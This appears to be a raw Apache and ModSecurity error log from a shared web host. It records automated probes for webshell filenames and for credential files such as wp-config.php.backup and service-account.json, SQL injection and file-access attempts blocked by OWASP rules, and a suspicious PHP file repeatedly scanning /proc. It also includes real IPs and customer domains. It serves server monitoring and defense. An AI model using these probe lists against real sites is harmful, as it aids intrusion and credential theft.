[Tue May 12 07:14:22.924495 2026] [proxy_http:error] [pid 1825179:tid 1825206] (20014)Internal error (specific information not available): [client 5.255.97.37:52498] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:22.924518 2026] [proxy:error] [pid 1825179:tid 1825206] [client 5.255.97.37:52498] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/service-account.json
[Tue May 12 07:14:23.099079 2026] [proxy_http:error] [pid 1842385:tid 1842412] (20014)Internal error (specific information not available): [client 5.255.97.37:56884] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:23.103601 2026] [proxy_http:error] [pid 1825287:tid 1825312] (20014)Internal error (specific information not available): [client 5.255.97.37:56850] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:23.536418 2026] [proxy_http:error] [pid 1825287:tid 1825307] (20014)Internal error (specific information not available): [client 5.255.97.37:52404] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:23.536839 2026] [proxy_http:error] [pid 1820198:tid 1820220] (20014)Internal error (specific information not available): [client 5.255.97.37:52472] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:23.539271 2026] [proxy_http:error] [pid 1844863:tid 1844876] (20014)Internal error (specific information not available): [client 5.255.97.37:52372] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 07:14:23.550113 2026] [proxy_http:error] [pid 1842385:tid 1842405] (20014)Internal error (specific information not available): [client 5.255.97.37:52422] AH01102: error reading status line from remote server 127.0.0.1:2082
PHP Warning:  filesize(): stat failed for /proc/1705255/task/1705255/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705255/task/1705255/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705255/task/1705255/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705255/task/1705255/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705255/task/1705255/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705255/task/1705255/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 07:16:27.346206 2026] [authz_core:error] [pid 1842385:tid 1842398] [client 194.163.140.214:61442] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007232/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007232/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007232/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007232/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007232/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007232/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 07:16:35.202474 2026] [security2:error] [pid 1820198:tid 1820215] [client 175.178.110.121:37984] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/"] [unique_id "agK3s81tk6y7yBJLpJpYBQAAAI8"], referer: http://www.manhattan-studio.fr
[Tue May 12 07:16:51.180045 2026] [authz_core:error] [pid 1825287:tid 1825305] [client 216.73.216.110:23771] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/blog/error_log
[Tue May 12 07:16:53.701105 2026] [authz_core:error] [pid 1842385:tid 1842392] [client 216.73.216.110:29776] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/src/Bridge/Silex/error_log
[Tue May 12 07:16:58.754245 2026] [ssl:error] [pid 1842385:tid 1842403] (EAI 2)Name or service not known: [client 192.178.6.9:47533] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:16:58.754283 2026] [ssl:error] [pid 1842385:tid 1842403] AH01941: stapling_renew_response: responder error
[Tue May 12 07:17:00.962427 2026] [authz_core:error] [pid 1844863:tid 1844874] [client 194.163.140.214:54402] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
PHP Warning:  filesize(): stat failed for /proc/12/task/12/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/12/task/12/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/12/task/12/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/12/task/12/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/12/task/12/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/12/task/12/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/66/task/66/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/66/task/66/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/66/task/66/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/66/task/66/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/66/task/66/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/66/task/66/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 07:18:11.823719 2026] [security2:error] [pid 1842385:tid 1842397] [client 44.197.76.210:28538] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/hotmodelsex.com"] [unique_id "agK4Exs7kySIUZ3ORnJJWwAAAQc"]
[Tue May 12 07:18:11.824094 2026] [security2:error] [pid 1842385:tid 1842397] [client 44.197.76.210:28538] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/hotmodelsex.com"] [unique_id "agK4Exs7kySIUZ3ORnJJWwAAAQc"]
[Tue May 12 07:18:11.824352 2026] [security2:error] [pid 1842385:tid 1842397] [client 44.197.76.210:28538] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/hotmodelsex.com"] [unique_id "agK4Exs7kySIUZ3ORnJJWwAAAQc"]
[Tue May 12 07:18:16.511439 2026] [security2:error] [pid 1842385:tid 1842411] [client 82.147.84.85:49193] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d844f10f9270780417f4cc1a34eb9bf9||1778564824||1778564464"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agK4GBs7kySIUZ3ORnJJegAAARQ"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 07:18:16.511654 2026] [security2:error] [pid 1842385:tid 1842411] [client 82.147.84.85:49193] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agK4GBs7kySIUZ3ORnJJegAAARQ"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 07:18:16.511881 2026] [security2:error] [pid 1842385:tid 1842411] [client 82.147.84.85:49193] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agK4GBs7kySIUZ3ORnJJegAAARQ"], referer: http://la-grande-fabrique.com/?p=4057
[Tue May 12 07:18:19.373973 2026] [authz_core:error] [pid 1842385:tid 1842392] [client 52.140.115.251:53433] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/rest-api/error_log
[Tue May 12 07:18:37.328370 2026] [security2:error] [pid 1825179:tid 1825218] [client 170.106.163.84:47162] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/page.php"] [unique_id "agK4Ldr1yOh9TvizezjBVQAAAFQ"]
[Tue May 12 07:19:09.325033 2026] [ssl:error] [pid 1820198:tid 1820223] [client 13.219.121.241:23893] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname missmandarine.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 07:19:29.252629 2026] [security2:error] [pid 1820198:tid 1820223] [client 170.106.35.187:35390] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/"] [unique_id "agK4Yc1tk6y7yBJLpJpY9gAAAJc"], referer: http://apoe.fr
[Tue May 12 07:19:45.076795 2026] [security2:error] [pid 1825287:tid 1825316] [client 15.235.145.59:62096] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/licensedminicab.com"] [unique_id "agK4cQgpmE1yW0glLdhP8AAAAMs"]
[Tue May 12 07:19:45.077254 2026] [security2:error] [pid 1825287:tid 1825316] [client 15.235.145.59:62096] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/licensedminicab.com"] [unique_id "agK4cQgpmE1yW0glLdhP8AAAAMs"]
[Tue May 12 07:19:45.077505 2026] [security2:error] [pid 1825287:tid 1825316] [client 15.235.145.59:62096] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/licensedminicab.com"] [unique_id "agK4cQgpmE1yW0glLdhP8AAAAMs"]
[Tue May 12 07:19:50.699745 2026] [security2:error] [pid 1825179:tid 1825221] [client 15.235.145.59:62556] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/licensedminicab.com"] [unique_id "agK4dtr1yOh9TvizezjB1gAAAFc"], referer: https://www.piregwan-genesis.com
[Tue May 12 07:19:50.700239 2026] [security2:error] [pid 1825179:tid 1825221] [client 15.235.145.59:62556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/licensedminicab.com"] [unique_id "agK4dtr1yOh9TvizezjB1gAAAFc"], referer: https://www.piregwan-genesis.com
[Tue May 12 07:19:50.700519 2026] [security2:error] [pid 1825179:tid 1825221] [client 15.235.145.59:62556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/licensedminicab.com"] [unique_id "agK4dtr1yOh9TvizezjB1gAAAFc"], referer: https://www.piregwan-genesis.com
[Tue May 12 07:19:55.815657 2026] [security2:error] [pid 1842385:tid 1842412] [client 51.83.9.208:40720] ModSecurity: Warning. Invalid URL Encoding: Not enough characters at the end of input at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "facturation.rentparadise.fr"] [uri "/langs/am_ET/%s"] [unique_id "agK4exs7kySIUZ3ORnJKZwAAARU"]
[Tue May 12 07:19:57.323958 2026] [security2:error] [pid 1825287:tid 1825309] [client 51.83.9.208:44422] ModSecurity: Warning. Invalid URL Encoding: Not enough characters at the end of input at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "facturation.rentparadise.fr"] [uri "/langs/am_ET/%s"] [unique_id "agK4fQgpmE1yW0glLdhP-wAAAMQ"]
[Tue May 12 07:20:11.011185 2026] [security2:error] [pid 1842385:tid 1842412] [client 51.83.9.208:40720] ModSecurity: Warning. Invalid URL Encoding: Not enough characters at the end of input at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "facturation.rentparadise.fr"] [uri "/langs/ar_DZ/%s"] [unique_id "agK4ixs7kySIUZ3ORnJKpgAAARU"]
[Tue May 12 07:20:12.649911 2026] [security2:error] [pid 1825287:tid 1825309] [client 51.83.9.208:44422] ModSecurity: Warning. Invalid URL Encoding: Not enough characters at the end of input at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "facturation.rentparadise.fr"] [uri "/langs/ar_DZ/%s"] [unique_id "agK4jAgpmE1yW0glLdhQCQAAAMQ"]
[Tue May 12 07:20:23.979022 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/moon.php
[Tue May 12 07:20:24.093854 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/a1.php
[Tue May 12 07:20:24.208559 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/ahax.php
[Tue May 12 07:20:24.326238 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/lite.php
[Tue May 12 07:20:24.454106 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/k.php
[Tue May 12 07:20:24.573001 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/leaf.php
[Tue May 12 07:20:24.704946 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/wp-conflg.php
[Tue May 12 07:20:24.819948 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/wp_filemanager.php
[Tue May 12 07:20:24.934690 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/pp.php
[Tue May 12 07:20:25.051479 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/index26.php
[Tue May 12 07:20:25.166303 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/12.php
[Tue May 12 07:20:25.281265 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/Marvins.php
[Tue May 12 07:20:25.419716 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/wp-config.php.backup"] [unique_id "agK4mfaAnTZtx1_H_wzc8QAAAUY"]
[Tue May 12 07:20:25.419861 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/wp-config.php.backup"] [unique_id "agK4mfaAnTZtx1_H_wzc8QAAAUY"]
[Tue May 12 07:20:25.420094 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/wp-config.php.backup"] [unique_id "agK4mfaAnTZtx1_H_wzc8QAAAUY"]
[Tue May 12 07:20:25.704281 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/aa.php
[Tue May 12 07:20:25.947731 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/abcd.php
[Tue May 12 07:20:26.113416 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/a2.php
[Tue May 12 07:20:26.285448 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/wp-gr.php
[Tue May 12 07:20:26.402141 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/xynz1.php
[Tue May 12 07:20:26.525039 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/uqcxit7i.php
[Tue May 12 07:20:26.658864 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/display_info.php
[Tue May 12 07:20:26.777548 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/wp-config-disabled.php
[Tue May 12 07:20:26.946621 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/test_info.php
[Tue May 12 07:20:27.061479 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/spip.php
[Tue May 12 07:20:27.176585 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/wp-index.php
[Tue May 12 07:20:27.291691 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/php-nginx.php
[Tue May 12 07:20:27.406581 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/wp-config.test.php
[Tue May 12 07:20:27.521476 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/op.php
[Tue May 12 07:20:27.636228 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/mandrill.php
